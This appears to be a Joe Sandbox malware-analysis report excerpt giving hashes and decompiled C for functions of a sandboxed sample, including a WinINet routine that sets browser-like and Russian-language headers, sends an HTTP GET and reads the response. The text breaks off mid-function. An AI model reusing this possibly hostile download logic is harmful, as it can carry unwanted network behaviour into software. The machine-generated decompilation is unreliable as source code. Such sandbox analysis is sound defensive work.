Opcode ID: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction ID: 57c928e6e796ec7aea49f19cfabf78c9b525272d76e34185ca50371a21d47389
Opcode Fuzzy Hash: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction Fuzzy Hash: 5CE04631108148AFCB212F66DC09EA93B79FB04389B508839F90586231CB39EC93CA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040F789 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F789() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040F795); // executed
				return _t1;
			}

0x0040f78e
0x0040f794

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000F795,0040F328), ref: 0040F78E

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
Instruction ID: c441ddb958a20976f8478718b12c4a1fde45198c9b197ccf8dba8fb5fcb3ec3f
Opcode Fuzzy Hash: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10001010 Relevance: 48.0, APIs: 19, Strings: 8, Instructions: 740
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E10001010(long __ecx, void* _a4) {
				char* _v8;
				char* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				long _v36;
				void** _v52;
				intOrPtr _v56;
				long _v60;
				char* _v76;
				void _v80;
				intOrPtr _v84;
				char* _v88;
				char* _v104;
				char* _v108;
				void* _v112;
				intOrPtr _v116;
				void* _v120;
				void _v288;
				int _v292;
				long _v296;
				char* _v300;
				char _v316;
				char* _v320;
				char* _v324;
				short* _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v356;
				signed int _v360;
				char* _v364;
				char* _v380;
				intOrPtr* _v504;
				char _v524;
				long _v532;
				intOrPtr _v536;
				char* _v540;
				char* _v556;
				intOrPtr _v584;
				char* _v620;
				signed int _v676;
				intOrPtr _v680;
				intOrPtr _v696;
				unsigned int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _v720;
				unsigned int _v724;
				unsigned int _v728;
				long _v732;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t296;
				signed int _t297;
				int _t304;
				intOrPtr _t305;
				char* _t316;
				intOrPtr _t317;
				signed int _t321;
				short* _t323;
				short _t326;
				intOrPtr* _t328;
				void* _t329;
				char* _t331;
				short* _t335;
				char* _t340;
				int _t342;
				intOrPtr _t345;
				intOrPtr _t346;
				char* _t348;
				signed int _t354;
				long _t355;
				long _t357;
				long _t360;
				void** _t373;
				signed int _t382;
				void* _t400;
				void** _t401;
				long _t403;
				signed int _t404;
				signed int _t407;
				unsigned int _t409;
				signed int _t413;
				long _t414;
				void* _t418;
				signed int _t422;
				signed int _t424;
				unsigned int _t426;
				void* _t432;
				char* _t435;
				void* _t443;
				long _t459;
				char* _t461;
				char* _t462;
				signed int _t473;
				signed int _t474;
				void* _t476;
				char* _t482;
				intOrPtr _t486;
				intOrPtr _t490;
				void* _t491;
				int _t492;
				void* _t493;
				void* _t494;
				void* _t496;
				char* _t497;
				intOrPtr* _t498;
				long _t499;
				intOrPtr _t500;
				signed int _t502;
				void* _t503;
				signed int _t504;
				long _t505;
				unsigned int _t511;
				long _t515;
				intOrPtr* _t526;
				int _t530;
				short* _t537;
				void* _t544;
				void* _t546;
				char* _t549;
				intOrPtr* _t550;
				void* _t554;
				void** _t564;
				unsigned int _t565;
				unsigned int _t566;
				void* _t567;
				void* _t568;
				char* _t569;
				char* _t577;
				char* _t581;
				void* _t585;
				short* _t588;
				signed int _t591;
				intOrPtr _t595;
				void* _t597;
				intOrPtr _t598;
				unsigned int _t599;
				unsigned int _t600;
				void* _t603;
				intOrPtr _t604;
				void* _t605;
				void* _t608;
				void* _t610;
				void* _t611;
				int _t612;
				short* _t613;
				void* _t615;
				void* _t619;
				void* _t621;
				unsigned int _t622;
				unsigned int _t623;
				signed int _t632;
				void* _t634;
				intOrPtr _t636;
				long _t638;
				void* _t639;
				long _t640;
				void* _t642;
				void* _t643;
				void** _t644;
				long _t645;
				signed int _t652;
				void* _t654;
				signed int _t659;
				signed int _t660;
				void* _t661;
				void* _t662;
				void* _t664;
				void* _t665;
				void* _t666;
				void* _t667;
				signed int _t668;
				void* _t669;
				void* _t671;
				void* _t673;
				void* _t675;
				void* _t676;

				_push(0xffffffff);
				_push(E1000F73B);
				_push( *[fs:0x0]);
				_t665 = _t664 - 0x170;
				_t296 =  *0x10017004; // 0x79eab102
				_t297 = _t296 ^ _t659;
				_v24 = _t297;
				_push(_t491);
				_push(_t297);
				 *[fs:0x0] =  &_v16;
				_t638 = __ecx;
				_t683 =  *((intOrPtr*)(__ecx + 0x28));
				_t610 = _a4;
				_v328 = _t610;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					_v332 =  *((intOrPtr*)(__ecx + 0x34));
				} else {
					_push(0x7800);
					 *((intOrPtr*)(__ecx + 0x30)) = 0x7800;
					_t490 = E1000320D(_t491, _t610, __ecx, _t683);
					_t665 = _t665 + 4;
					 *((intOrPtr*)(_t638 + 0x28)) = _t490;
					 *(_t638 + 0x34) = 0;
					_v332 = 0;
				}
				_v296 = 0;
				InternetSetFilePointer(_t610, 0, 0, 0, 0);
				do {
					_t304 = InternetReadFile(_t610,  &(( *(_t638 + 0x34))[ *((intOrPtr*)(_t638 + 0x28))]), 0x3e8,  &_v296); // executed
					_t584 = _v296;
					_t492 = _t304;
					_t305 =  *((intOrPtr*)(_t638 + 0x30));
					 *(_t638 + 0x34) =  &(( *(_t638 + 0x34))[_t584]);
					_t684 = _t305 -  *(_t638 + 0x34) - 0x3e8;
					if(_t305 -  *(_t638 + 0x34) <= 0x3e8) {
						_t486 = _t305 + 0x7800;
						_push(_t486);
						 *((intOrPtr*)(_t638 + 0x30)) = _t486;
						_t636 = E1000320D(_t492, _t610, _t638, _t684);
						E10005BC0(_t636,  *((intOrPtr*)(_t638 + 0x28)),  &(( *(_t638 + 0x34))[1]));
						E10003224( *((intOrPtr*)(_t638 + 0x28)));
						_t584 = _v296;
						_t665 = _t665 + 0x14;
						 *((intOrPtr*)(_t638 + 0x28)) = _t636;
						_t610 = _v328;
					}
				} while (_t492 != 0 && _t584 != 0);
				_v296 = 0x103;
				E10004730(_t610,  &_v288, 0, 0x104);
				_t666 = _t665 + 0xc;
				if(HttpQueryInfoA(_t610, 0x1d,  &_v288,  &_v296, 0) == 0) {
					L32:
					( *(_t638 + 0x34))[ *((intOrPtr*)(_t638 + 0x28))] = 0;
					 *[fs:0x0] = _v16;
					_pop(_t611);
					_pop(_t639);
					_pop(_t493);
					return E100031FF( *(_t638 + 0x34) - _v332, _t493, _v24 ^ _t659, _t584, _t611, _t639);
				} else {
					_v324 = 0;
					_t316 =  &_v316;
					_v320 = 0;
					__imp__CoCreateInstance(_t316, 0, 1, 0x100101b0,  &_v324);
					if(_t316 < 0 || _v324 == 0) {
						goto L32;
					} else {
						_t526 =  &_v288;
						_v356 = 0;
						_v340 = 0;
						_t585 = _t526 + 1;
						_v336 = 0xf;
						_v356 = 0;
						asm("o16 nop [eax+eax]");
						do {
							_t317 =  *_t526;
							_t526 = _t526 + 1;
						} while (_t317 != 0);
						_push(_t526 - _t585);
						_push( &_v288);
						L83();
						_v8 = 0;
						_t494 = MultiByteToWideChar;
						_t530 =  &(_v340[1]);
						_t320 =  >=  ? _v356 :  &_v356;
						_v292 = _t530;
						_t321 = MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _t530, 0, 0);
						_t612 = _t321;
						_push( ~(0 | _v336 - 0x00000010 > 0x00000000) | _t321 * 0x00000002);
						_t323 = E1000320D(MultiByteToWideChar, _t612, _t638, _v336 - 0x10);
						_t667 = _t666 + 4;
						_v328 = _t323;
						_t536 =  >=  ? _v356 :  &_v356;
						_t613 = _t323;
						MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _v292, _t613, _t612);
						_t537 = _t613;
						_v380 = 0;
						_v364 = 0;
						_v360 = 7;
						_v380 = 0;
						_t66 =  &(_t537[1]); // 0x2
						_t588 = _t66;
						do {
							_t326 =  *_t537;
							_t537 =  &(_t537[1]);
						} while (_t326 != 0);
						L108();
						E10003224(_t613);
						_t668 = _t667 + 4;
						_v8 = 1;
						_t328 = _v324;
						_t590 =  >=  ? _v380 :  &_v380;
						_t329 =  *((intOrPtr*)( *_t328 + 0x10))(_t328,  >=  ? _v380 :  &_v380, L"text",  &_v320, _t613, _t537 - _t588 >> 1);
						_v8 = 0;
						_t615 = _t329;
						_t591 = _v360;
						if(_t591 < 8) {
							L19:
							_v8 = 0xffffffff;
							_t584 = _v336;
							_v364 = 0;
							_v360 = 7;
							_v380 = 0;
							if(_t584 < 0x10) {
								L23:
								if(_t615 >= 0) {
									_t704 = _v320;
									if(_v320 != 0) {
										_t496 = ( *(_t638 + 0x34) - _v332) * 8 -  *(_t638 + 0x34) - _v332;
										_push(_t496);
										_t335 = E1000320D(_t496, _t615, _t638, _t704);
										_t669 = _t668 + 4;
										_t544 =  *(_t638 + 0x34) - _v332;
										_v292 = 0;
										_push(0);
										_v300 = 0;
										_t616 =  *_v320;
										_push( &_v292);
										_v328 = _t335;
										_push( &_v300);
										_t584 = _v320;
										_push(_t544);
										_push(_t335);
										_push(_t496);
										_t497 = _v332;
										_push( *((intOrPtr*)(_t638 + 0x28)) + _t497);
										_push(_t544);
										_push(0);
										_push(_v320);
										if( *((intOrPtr*)( *_v320 + 0x10))() >= 0) {
											_t342 = _v292;
											_t595 =  *((intOrPtr*)(_t638 + 0x30));
											_t546 = _t342 + _t497;
											_t706 = _t595 - _t546;
											if(_t595 <= _t546) {
												_t345 = _t546 + 0x3e8;
												_push(_t345);
												 *((intOrPtr*)(_t638 + 0x30)) = _t345;
												_t346 = E1000320D(_t497, _t616, _t638, _t706);
												_push(_t497);
												_push( *((intOrPtr*)(_t638 + 0x28)));
												L134();
												E10003224( *((intOrPtr*)(_t638 + 0x28)));
												_t595 =  *((intOrPtr*)(_t638 + 0x30));
												_t669 = _t669 + 0x10;
												_t342 = _v292;
												 *((intOrPtr*)(_t638 + 0x28)) = _t346;
											}
											_push(_t342);
											_push(_v328);
											_t584 = _t595 - _t497;
											L134();
											_t669 = _t669 + 8;
											 *(_t638 + 0x34) =  &(_t497[_v292]);
										}
										E10003224(_v328);
										_t340 = _v320;
										 *((intOrPtr*)( *_t340 + 8))(_t340);
									}
								}
								_t331 = _v324;
								 *((intOrPtr*)( *_t331 + 8))(_t331);
								goto L32;
							} else {
								_t549 = _v356;
								_t584 = _t584 + 1;
								_t348 = _t549;
								if(_t584 < 0x1000) {
									L22:
									_push(_t584);
									E10003216(_t549);
									_t668 = _t668 + 8;
									goto L23;
								} else {
									_t549 =  *(_t549 - 4);
									_t584 = _t584 + 0x23;
									if(_t348 - _t549 + 0xfffffffc > 0x1f) {
										goto L33;
									} else {
										goto L22;
									}
								}
							}
						} else {
							_t581 = _v380;
							_t608 = 2 + _t591 * 2;
							_t482 = _t581;
							if(_t608 < 0x1000) {
								L18:
								_push(_t608);
								E10003216(_t581);
								_t668 = _t668 + 8;
								goto L19;
							} else {
								_t549 =  *(_t581 - 4);
								_t584 = _t608 + 0x23;
								if(_t482 - _t549 + 0xfffffffc > 0x1f) {
									L33:
									E1000633C(_t494, _t549, _t584, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t659);
									_t660 = _t668;
									_push(0xffffffff);
									_push(E1000F78D);
									_push( *[fs:0x0]);
									_t671 = _t668 - 0x68;
									_t354 =  *0x10017004; // 0x79eab102
									_t355 = _t354 ^ _t660;
									__eflags = _t355;
									_v532 = _t355;
									_push(_t494);
									_push(_t638);
									_push(_t615);
									_push(_t355);
									 *[fs:0x0] =  &_v524;
									_v620 = _t549;
									_t498 = _v504;
									_t550 = _t498;
									_v556 = 0;
									_v584 = _t498;
									_v540 = 0;
									_v536 = 0xf;
									_t597 = _t550 + 1;
									_v556 = 0;
									do {
										_t357 =  *_t550;
										_t550 = _t550 + 1;
										__eflags = _t357;
									} while (_t357 != 0);
									_push(_t550 - _t597);
									_push(_t498);
									L83();
									_v12 = 0;
									__eflags = _v32 - 0x10;
									_t499 = _v36;
									_t554 =  >=  ? _v52 :  &_v52;
									_v112 = _t554;
									__eflags = _t499 - 7;
									if(_t499 < 7) {
										L54:
										__eflags = _v32 - 0x10;
										_t619 =  >=  ? _v52 :  &_v52;
										__eflags = _t499;
										if(_t499 == 0) {
											L57:
											_t640 = _t638 | 0xffffffff;
											__eflags = _t640;
										} else {
											_t638 = E1000F670(_t619, 0x2f, _t499);
											_t671 = _t671 + 0xc;
											__eflags = _t638;
											if(_t638 == 0) {
												goto L57;
											} else {
												_t640 = _t638 - _t619;
											}
										}
										__eflags = _t499 - _t640;
										_v104 = 0;
										_v88 = 0;
										_t556 =  <  ? _t499 : _t640;
										_v84 = 0xf;
										__eflags = _v32 - 0x10;
										_push( <  ? _t499 : _t640);
										_t359 =  >=  ? _v52 :  &_v52;
										_push( >=  ? _v52 :  &_v52);
										_v104 = 0;
										L83();
										_v12 = 1;
										_t360 = _v36;
										__eflags = _t360 - _t640;
										_t641 =  <  ? _t360 : _t640;
										__eflags = _v32 - 0x10;
										_t559 =  >=  ? _v52 :  &_v52;
										_t361 = _t360 - ( <  ? _t360 : _t640);
										_v36 = _t360 - ( <  ? _t360 : _t640);
										E10005BC0( >=  ? _v52 :  &_v52,  &(( >=  ? _v52 :  &_v52)[ <  ? _t360 : _t640]), _t360 - ( <  ? _t360 : _t640) + 1);
										_t500 = _v116;
										_t620 = 0;
										_v108 = 0;
										_t186 = _t500 + 0x44; // 0x74cb59b4
										E10006419(_t186, 0x104, _v80, 0x103);
										_t673 = _t671 + 0x1c;
										asm("sbb eax, eax");
										_t642 = InternetOpenA( *(_t500 + 0xc),  ~( *(_t500 + 0x38)) & 0x00000003,  *(_t500 + 0x38), 0, 0);
										_v112 = _t642;
										__eflags = _t642;
										if(_t642 == 0) {
											L70:
											_t598 = _v84;
											__eflags = _t620;
											_t502 = 0 | _t620 > 0x00000000;
											__eflags = _t598 - 0x10;
											if(_t598 < 0x10) {
												L74:
												_t599 = _v32;
												_v88 = 0;
												_v84 = 0xf;
												_v104 = 0;
												__eflags = _t599 - 0x10;
												if(_t599 < 0x10) {
													L78:
													 *[fs:0x0] = _v20;
													_pop(_t621);
													_pop(_t643);
													_pop(_t503);
													__eflags = _v28 ^ _t660;
													return E100031FF(_t502, _t503, _v28 ^ _t660, _t599, _t621, _t643);
												} else {
													_t564 = _v52;
													_t599 = _t599 + 1;
													_t373 = _t564;
													__eflags = _t599 - 0x1000;
													if(_t599 < 0x1000) {
														L77:
														_push(_t599);
														E10003216(_t564);
														goto L78;
													} else {
														_t564 =  *(_t564 - 4);
														_t599 = _t599 + 0x23;
														__eflags = _t373 - _t564 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L81;
														} else {
															goto L77;
														}
													}
												}
											} else {
												_t569 = _v104;
												_t603 = _t598 + 1;
												_t435 = _t569;
												__eflags = _t603 - 0x1000;
												if(_t603 < 0x1000) {
													L73:
													_push(_t603);
													E10003216(_t569);
													_t673 = _t673 + 8;
													goto L74;
												} else {
													_t564 =  *(_t569 - 4);
													_t599 = _t603 + 0x23;
													__eflags = _t435 - _t564 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L81;
													} else {
														goto L73;
													}
												}
											}
										} else {
											_v80 = 1;
											InternetSetOptionA(_t642, 0x41,  &_v80, 4);
											__eflags = _v84 - 0x10;
											_t442 =  >=  ? _v104 :  &_v104;
											_t443 = InternetConnectA(_t642,  >=  ? _v104 :  &_v104, 0x50,  *(_t500 + 0x3c),  *(_t500 + 0x40), 3, 0, 1);
											_t502 = InternetCloseHandle;
											_v120 = _t443;
											__eflags = _t443;
											if(_t443 == 0) {
												L69:
												InternetCloseHandle(_t642);
												goto L70;
											} else {
												__eflags = _v32 - 0x10;
												_t571 =  >=  ? _v52 :  &_v52;
												_t620 = HttpOpenRequestA(_t443, "GET",  >=  ? _v52 :  &_v52, 0, 0, 0, 0x80400000, 1);
												__eflags = _t620;
												if(_t620 == 0) {
													L68:
													InternetCloseHandle(_v120);
													_t620 = _v108;
													goto L69;
												} else {
													_push(0x7d);
													_v76 = 0;
													_push("Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
													_v60 = 0;
													_v56 = 0xf;
													_v76 = 0;
													L83();
													_v12 = 2;
													__eflags = _v56 - 0x10;
													_t642 = HttpAddRequestHeadersA;
													_t448 =  >=  ? _v76 :  &_v76;
													HttpAddRequestHeadersA(_t620,  >=  ? _v76 :  &_v76, _v60, 0x20000000);
													_push(0x28);
													_push("Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
													L83();
													__eflags = _v56 - 0x10;
													_t451 =  >=  ? _v76 :  &_v76;
													HttpAddRequestHeadersA(_t620,  >=  ? _v76 :  &_v76, _v60, 0x20000000);
													_push(0x32);
													_push("Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
													L83();
													__eflags = _v56 - 0x10;
													_t454 =  >=  ? _v76 :  &_v76;
													HttpAddRequestHeadersA(_t620,  >=  ? _v76 :  &_v76, _v60, 0x20000000);
													_push(0x37);
													_push("Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
													L83();
													__eflags = _v56 - 0x10;
													_t457 =  >=  ? _v76 :  &_v76;
													HttpAddRequestHeadersA(_t620,  >=  ? _v76 :  &_v76, _v60, 0x20000000);
													_v12 = 1;
													_t604 = _v56;
													__eflags = _t604 - 0x10;
													if(_t604 < 0x10) {
														L65:
														_t459 = HttpSendRequestA(_t620, 0, 0, 0, 0);
														__eflags = _t459;
														if(_t459 != 0) {
															_push(_t620); // executed
															_t461 = E10001010(_v116); // executed
															_v108 = _t461;
														}
														InternetCloseHandle(_t620);
														_t642 = _v112;
														goto L68;
													} else {
														_t577 = _v76;
														_t605 = _t604 + 1;
														_t462 = _t577;
														__eflags = _t605 - 0x1000;
														if(_t605 < 0x1000) {
															L64:
															_push(_t605);
															E10003216(_t577);
															_t673 = _t673 + 8;
															goto L65;
														} else {
															_t564 =  *(_t577 - 4);
															_t599 = _t605 + 0x23;
															__eflags = _t462 - _t564 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L80;
															} else {
																goto L64;
															}
														}
													}
												}
											}
										}
									} else {
										_t149 = _t499 - 6; // -6
										_v108 = _t149 + _t554;
										_t638 = E1000F670(_t554, 0x68, _t149 + _t554 - _t554);
										_t671 = _t671 + 0xc;
										__eflags = _t638;
										if(_t638 != 0) {
											asm("o16 nop [eax+eax]");
											do {
												_t564 = _t638;
												_t599 = "http://";
												_t620 = 3;
												__eflags =  *_t564 -  *_t599;
												if( *_t564 ==  *_t599) {
													_t564 =  &(_t564[1]);
													_t599 = _t599 + 4;
													_t620 = 0xffffffffffffffff;
													__eflags = 3;
												}
												_t473 =  *_t564;
												__eflags = _t473 -  *_t599;
												if(_t473 !=  *_t599) {
													L47:
													asm("sbb eax, eax");
													_t474 = _t473 | 0x00000001;
													__eflags = _t474;
												} else {
													_t473 = _t564[0];
													__eflags = _t473 -  *(_t599 + 1);
													if(_t473 !=  *(_t599 + 1)) {
														goto L47;
													} else {
														_t473 = _t564[0];
														__eflags = _t473 -  *((intOrPtr*)(_t599 + 2));
														if(_t473 !=  *((intOrPtr*)(_t599 + 2))) {
															goto L47;
														} else {
															__eflags = _t620 - 0xffffffff;
															if(_t620 == 0xffffffff) {
																L46:
																_t474 = 0;
															} else {
																_t473 = _t564[0];
																__eflags = _t473 -  *((intOrPtr*)(_t599 + 3));
																if(_t473 !=  *((intOrPtr*)(_t599 + 3))) {
																	goto L47;
																} else {
																	goto L46;
																}
															}
														}
													}
												}
												__eflags = _t474;
												if(_t474 == 0) {
													_t638 = _t638 - _v112;
													__eflags = _t638 - 0xffffffff;
													if(_t638 == 0xffffffff) {
														goto L54;
													} else {
														__eflags = _t499 - _t638;
														if(__eflags < 0) {
															L82();
															L80:
															E1000633C(_t502, _t564, _t599, __eflags);
															L81:
															E1000633C(_t502, _t564, _t599, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push("invalid string position");
															E100031DF(_t502, _t599, _t620, _t642);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t660);
															_t661 = _t673;
															_t675 = _t673 - 0xc;
															_t379 = _v680;
															_push(_t502);
															_t504 = _v676;
															_push(_t642);
															_t644 = _t564;
															_v696 = _v680;
															_push(_t620);
															_t565 = _t644[5];
															_v700 = _t565;
															__eflags = _t504 - _t565;
															if(_t504 > _t565) {
																__eflags = _t504 - 0x7fffffff;
																if(_t504 > 0x7fffffff) {
																	L106:
																	E10001CA0(_t565);
																	goto L107;
																} else {
																	_t632 = _t504 | 0x0000000f;
																	__eflags = _t632 - 0x7fffffff;
																	if(__eflags > 0) {
																		L93:
																		_t620 = 0x7fffffff;
																		_t418 = 0x80000023;
																		goto L94;
																	} else {
																		_t599 = _t565 >> 1;
																		__eflags = _t565 - 0x7fffffff - _t599;
																		if(__eflags > 0) {
																			goto L93;
																		} else {
																			_t432 = _t599 + _t565;
																			__eflags = _t632 - _t432;
																			_t620 =  <  ? _t432 : _t632;
																			_t565 = _t620 + 1;
																			__eflags = _t565 - 0x1000;
																			if(_t565 < 0x1000) {
																				__eflags = _t565;
																				if(__eflags == 0) {
																					_t422 = 0;
																					__eflags = 0;
																				} else {
																					_push(_t565);
																					_t422 = E10003229(_t504, _t620, _t644, __eflags);
																					_t675 = _t675 + 4;
																				}
																				goto L99;
																			} else {
																				_t418 = _t565 + 0x23;
																				__eflags = _t418 - _t565;
																				if(__eflags <= 0) {
																					L107:
																					E10001DE0(_t504);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t661);
																					_t662 = _t675;
																					_t676 = _t675 - 0xc;
																					_t382 = _v704;
																					_t600 = _v708;
																					_push(_t504);
																					_push(_t644);
																					_push(_t620);
																					_t622 = _t565;
																					_v724 = _t600;
																					_v720 = _t382;
																					_t566 =  *(_t622 + 0x14);
																					_v728 = _t566;
																					__eflags = _t382 - _t566;
																					if(_t382 > _t566) {
																						__eflags = _t382 - 0x7ffffffe;
																						if(__eflags > 0) {
																							L132:
																							E10001CA0(_t566);
																							goto L133;
																						} else {
																							_t652 = _t382 | 0x00000007;
																							__eflags = _t652 - 0x7ffffffe;
																							if(_t652 <= 0x7ffffffe) {
																								_t600 = _t566 >> 1;
																								__eflags = _t566 - 0x7ffffffe - _t600;
																								if(_t566 <= 0x7ffffffe - _t600) {
																									_t400 = _t600 + _t566;
																									__eflags = _t652 - _t400;
																									_t644 =  <  ? _t400 : _t652;
																									_t401 =  &(_t644[0]);
																									__eflags = _t401 - 0x7fffffff;
																									if(_t401 > 0x7fffffff) {
																										goto L131;
																									} else {
																										_t403 = _t401 + _t401;
																										__eflags = _t403 - 0x1000;
																										if(_t403 < 0x1000) {
																											__eflags = _t403;
																											if(__eflags == 0) {
																												_t504 = 0;
																												__eflags = 0;
																											} else {
																												_push(_t403);
																												_t413 = E10003229(_t504, _t622, _t644, __eflags);
																												_t676 = _t676 + 4;
																												_t504 = _t413;
																											}
																											goto L125;
																										} else {
																											goto L119;
																										}
																									}
																								} else {
																									_t644 = 0x7ffffffe;
																									_t403 = 0xfffffffe;
																									goto L119;
																								}
																							} else {
																								_t644 = 0x7ffffffe;
																								_t403 = 0xfffffffe;
																								L119:
																								_t280 = _t403 + 0x23; // 0x100000021
																								_t566 = _t280;
																								__eflags = _t566 - _t403;
																								if(__eflags <= 0) {
																									L131:
																									E10001DE0(_t504);
																									goto L132;
																								} else {
																									_push(_t566);
																									_t414 = E10003229(_t504, _t622, _t644, __eflags);
																									_t676 = _t676 + 4;
																									__eflags = _t414;
																									if(__eflags == 0) {
																										L133:
																										E1000633C(_t504, _t566, _t600, __eflags);
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										_push(_t662);
																										_push(_t644);
																										_t645 = _v732;
																										_push(_t622);
																										_t623 = _t600;
																										__eflags = _t645;
																										if(_t645 != 0) {
																											__eflags = _t566;
																											if(__eflags != 0) {
																												_push(_t504);
																												_t505 = _v12;
																												__eflags = _t505;
																												if(_t505 == 0) {
																													L141:
																													E10004730(_t623, _t566, 0, _t623);
																													__eflags = _t505;
																													if(__eflags != 0) {
																														__eflags = _t623 - _t645;
																														if(__eflags >= 0) {
																															goto L143;
																														} else {
																															 *((intOrPtr*)(E10006406(__eflags))) = 0x22;
																															E1000632C();
																															return 0x22;
																														}
																													} else {
																														 *((intOrPtr*)(E10006406(__eflags))) = 0x16;
																														E1000632C();
																														L143:
																														return 0x16;
																													}
																												} else {
																													__eflags = _t623 - _t645;
																													if(_t623 < _t645) {
																														goto L141;
																													} else {
																														E10005BC0(_t566, _t505, _t645);
																														__eflags = 0;
																														return 0;
																													}
																												}
																											} else {
																												 *((intOrPtr*)(E10006406(__eflags))) = 0x16;
																												E1000632C();
																												return 0x16;
																											}
																										} else {
																											__eflags = 0;
																											return 0;
																										}
																									} else {
																										_t281 = _t414 + 0x23; // 0x23
																										_t504 = _t281 & 0xffffffe0;
																										 *(_t504 - 4) = _t414;
																										L125:
																										_t404 = _v20;
																										 *(_t622 + 0x14) = _t644;
																										 *(_t622 + 0x10) = _t404;
																										_t644 = _t404 + _t404;
																										E10005BC0(_t504, _v24, _t644);
																										_t676 = _t676 + 0xc;
																										 *((short*)(_t644 + _t504)) = 0;
																										_t407 = _v28;
																										__eflags = _t407 - 8;
																										if(_t407 < 8) {
																											L130:
																											 *_t622 = _t504;
																											return _t622;
																										} else {
																											_t567 = 2 + _t407 * 2;
																											_t409 =  *_t622;
																											__eflags = _t567 - 0x1000;
																											if(_t567 < 0x1000) {
																												L129:
																												_push(_t567);
																												E10003216(_t409);
																												goto L130;
																											} else {
																												_t600 =  *(_t409 - 4);
																												_t566 = _t567 + 0x23;
																												__eflags = _t409 - _t600 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L133;
																												} else {
																													_t409 = _t600;
																													goto L129;
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t511 = _t622;
																						__eflags = _t566 - 8;
																						if(_t566 >= 8) {
																							_t511 =  *_t622;
																						}
																						_t654 = _t382 + _t382;
																						 *(_t622 + 0x10) = _t382;
																						E10005BC0(_t511, _t600, _t654);
																						__eflags = 0;
																						 *((short*)(_t654 + _t511)) = 0;
																						return _t622;
																					}
																				} else {
																					L94:
																					_push(_t418);
																					_t565 = E10003229(_t504, _t620, _t644, __eflags);
																					_t675 = _t675 + 4;
																					__eflags = _t565;
																					if(__eflags == 0) {
																						L105:
																						E1000633C(_t504, _t565, _t599, __eflags);
																						goto L106;
																					} else {
																						_t258 = _t565 + 0x23; // 0x23
																						_t422 = _t258 & 0xffffffe0;
																						 *(_t422 - 4) = _t565;
																						L99:
																						_v16 = _t422;
																						_t644[4] = _t504;
																						_t644[5] = _t620;
																						E10005BC0(_t422, _v20, _t504);
																						_t620 = _v16;
																						_t675 = _t675 + 0xc;
																						_t424 = _v24;
																						 *((char*)(_t620 + _t504)) = 0;
																						__eflags = _t424 - 0x10;
																						if(_t424 < 0x10) {
																							L104:
																							 *_t644 = _t620;
																							return _t644;
																						} else {
																							_t568 = _t424 + 1;
																							_t426 =  *_t644;
																							__eflags = _t568 - 0x1000;
																							if(_t568 < 0x1000) {
																								L103:
																								_push(_t568);
																								E10003216(_t426);
																								goto L104;
																							} else {
																								_t599 =  *(_t426 - 4);
																								_t565 = _t568 + 0x23;
																								__eflags = _t426 - _t599 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L105;
																								} else {
																									_t426 = _t599;
																									goto L103;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t634 = _t644;
																__eflags = _t565 - 0x10;
																if(_t565 >= 0x10) {
																	_t634 =  *_t644;
																}
																_t644[4] = _t504;
																E10005BC0(_t634, _t379, _t504);
																 *((char*)(_t634 + _t504)) = 0;
																return _t644;
															}
														} else {
															_t476 = _t499 - _t638;
															__eflags = _t476 - 7;
															_t607 =  <  ? _t476 : 7;
															__eflags = _v32 - 0x10;
															_t579 =  >=  ? _v52 :  &_v52;
															_t515 = _t499 - 7;
															_t580 =  &(( >=  ? _v52 :  &_v52)[_t638]);
															_v36 = _t515;
															__eflags = _t515 - _t638 + 1;
